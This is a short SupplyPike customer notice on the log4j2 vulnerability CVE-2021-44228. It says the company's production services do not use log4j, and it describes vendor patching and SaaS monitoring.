tl;dr: SupplyPike production services are not directly affected by the log4j issue.

Background

On December 9 2021, a serious security vulnerability (CVE-2021-44228) was disclosed by Apache in the popular Java-based logging framework, log4j2. Due to the Critical severity level of the vulnerability, it has been the hottest security topic of the last week. In short, an external attacker who can control log messages outputted by log4j2 server-side could potentially executive arbitrary Java bytecode by dynamically fetching it from a remote LDAP server. Millions of corporate and government servers and services are vulnerable to this exploit given how ubiquitous the logging library is. Further analysis of the vulnerability can be found here.

SupplyPike Services

In this particular case, SupplyPike services are not directly vulnerable to the exploit. SupplyPike does not depend on log4j for logging on any of its production services. Additionally, none of our services are Java-based except for one, which had already been planned to sunset at the end of the year.

Dependencies

SupplyPike depends on cloud vendors to run some of our databases and workloads. AWS Elasticsearch and Qbox are among two cloud vendors who provided statements and patches on any potentially affected servers.

Third-party SaaS

As with any modern business, we use and depend on many third-party SaaS solutions for various business operations. We routinely monitor our SaaS partners to ensure they perform security investigations and address critical vulnerabilities.

At this point in time, we have no data or reason to believe any of our servers or customer data had been targets of the recently disclosed log4j remote code execution vulnerability.

If you have any questions about this topic, you can contact us at security@supplypike.com.